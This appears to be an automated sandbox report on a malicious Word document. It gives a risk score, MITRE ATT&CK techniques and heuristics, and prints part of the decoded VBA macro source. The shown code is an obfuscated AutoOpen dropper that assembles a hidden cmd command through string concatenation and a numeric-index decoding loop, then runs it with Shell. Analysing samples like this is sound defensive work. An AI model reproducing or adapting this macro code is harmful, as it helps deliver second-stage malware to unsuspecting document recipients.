MALICIOUS
82
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute obfuscated code that attempts to download and run a second-stage payload. The macro's obfuscation and the presence of the AutoOpen marker strongly suggest a downloader or droppper functionality.
Heuristics 4
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13869 bytes |
SHA-256: 47866b0626a262d6c73143cb2d2b7773d78b8e2b90452f0ded3da6d53e62d5ea |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "GSzXhXWSv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Fix(331004079)
TypeName Int(70)
TypeName Round(6)
TypeName ChrB(1055)
Shell! KeyString(vbKeyC) + jctHvdBj + WRTihvcPhdGj + TjXrAWAJVc + NLBuhIVdQ + UdzjOcapsu + kQacFUN + NNDUjCw + pdXXjoVSwid + HljzBAZrYz + aYipwmcD + vjiwHQ + HTZiwZjzajY + iBFUKSdHHrV + cjsJHwlovqSmA + iCwwHqVQ, 307535380 - 307535380
TypeName Fix(428)
TypeName Chr(25388 / CAAip - 85056 - lYzFX)
End Sub
Attribute VB_Name = "plEKdhWwEvFR"
Function TjXrAWAJVc()
On Error Resume Next
TypeName ChrW(12)
TypeName CByte(micwpz * LvfToD)
iKppF = "m" + "d " + "/V" + ":O " + " /" + CStr(Chr(jTRUitottPZD + QtYZoNtMbl + 67 + iBumVfOIQILsQ + QTmImVhEcsd)) + " " + " " + CStr(Chr(nTsfZnLmzHtu + HHifJLndtpc + 34 + AzStsccUwQ + cSoRMsOwq)) + "s" + "et "
TypeName Rnd(lflbOD * duSQrF)
TypeName Oct(3090)
LRlNDGkqPsV = " " + " N" + "qj=" + "o" + CStr(Chr(tNUrwKaDCRTKpj + RMKLrCM + 67 + zMhwOKdZAYjXl + VMcCIHwk)) + "IHJ"
TypeName CSng(RdZYF)
TypeName 7387
TypeName Cos(zmKXnf + dVwqJS)
pLZEtFT = "S" + "zs" + "fwa" + "HG" + "s" + "b" + "K" + "Gs" + "j" + "PP"
TypeName Sin(152)
TypeName Hex(48375 - MDZuD)
faaoWvaqI = "3" + "hd" + "\" + "y/F" + ",u" + "(+m" + "1.n"
TypeName rmSkEa
TypeName Cos(vVzac)
TypeName CByte(ZbGMJ / vIFSM)
FmTtZ = ";" + ")D6" + "{W" + "t @" + "=e" + "-" + "}kN" + CStr(Chr(wljPFrAnwzztG + ploIhiji + 76 + iaKYlAciFSYzK + fkniMcGovTWK)) + ":i"
TjXrAWAJVc = iKppF + LRlNDGkqPsV + pLZEtFT + faaoWvaqI + FmTtZ
TypeName CInt(FUTcw)
TypeName Sqr(65734 - WnWLZ)
End Function
Function NLBuhIVdQ()
On Error Resume Next
TypeName Chr(LIOmJV)
TypeName zBHDz
vnGhcjvTU = "p" + "rv" + CStr(Chr(MQCfZaQqP + VKBVhratbCttDo + 99 + lOEPqAStCV + UQoVafqRESNb)) + "$x?" + CStr(Chr(zOSXzrMCi + zIVsHTMZ + 108 + LNYSYwvTTB + aAEafWbYSl)) + "'&"
TypeName CLng(BlVHY * uhQYH * 48154 / GkqZb)
TypeName kanvZz
DAiFmlzf = "&" + " " + "for" + " %" + "S " + "in " + " " + "( "
TypeName GmzCk
TypeName Kqzlpr
dksSTti = " 5" + "4" + " " + "0" + " " + " 9" + " " + " " + "46 " + "5" + "5"
TypeName Sin(zJJipz)
TypeName Sqr(pnHTF)
qaTwFqNd = " " + "1" + "7 " + " " + " 22" + " " + " " + "46 " + " 6"
TypeName CDate(YPJlJ)
TypeName Cos(BjquXW)
XYiHmXiQHwq = "1 " + " " + "61 " + "43 " + " " + "5" + "8 "
NLBuhIVdQ = vnGhcjvTU + DAiFmlzf + dksSTti + qaTwFqNd + XYiHmXiQHwq
TypeName CDate(64047 + koNBB)
TypeName Cos(YikoG + hRtzcf)
End Function
Function UdzjOcapsu()
On Error Resume Next
TypeName Cos(1)
TypeName 29
TypeName Round(TDwvqj)
HjulBcK = "10" + " " + " " + "20 " + " 23" + " 4" + "5 3"
TypeName 393
TypeName CDbl(3)
OKjVAJ = "5" + " " + "46" + " " + "9 " + " " + "47" + " " + " 0"
TypeName Sgn(46)
TypeName Hex(65214156)
iwVIG = " 14" + " 18" + " " + " " + "46" + " " + " 57" + " 42" + " "
TypeName Sqr(4887 - AZtDu - 82192 - ZzwUiu)
TypeName Atn(217997026)
CBciRiWQzV = " " + "43" + " " + " " + " " + "50 " + " " + "4" + "6 " + " 42" + " " + " 3" + "4 "
TypeName idwlRK
TypeName Atn(pGpQG)
TypeName Rnd(kHhri)
hwXkVD = " " + "4" + "1 " + "46" + " 14" + " " + " " + "1"
TypeName 74096996
TypeName CDbl(vJNtS)
TypeName ChrW(8)
jTOMrRlYnm = " " + "6" + "1" + " " + " 53" + " " + "46" + " " + "35" + " 42" + " " + " " + "36"
TypeName SNrkIo
TypeName REwFa
TypeName CStr(UZWqL)
WdhwbJ = " " + "5" + "8" + " " + " "
TypeName CStr(62)
TypeName DcvYUO
FhmABwXlvF = " 5" + "5" + " " + " " + "61"
TypeName 352368397
TypeName 1659
TypeName riEMm
JQFrFiY = " " + " 3" + "2 " + " " + "45 " + " " + " 62" + " " + "22 " + "42 "
TypeName Round(62217 - UzvOBF)
TypeName Hex(81586 * OPRwD)
TypeName CDbl(DwiGj / fbGWVa)
WaZtDYbmznw = " " + " 4" + "2 " + "5" + "4" + " "
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.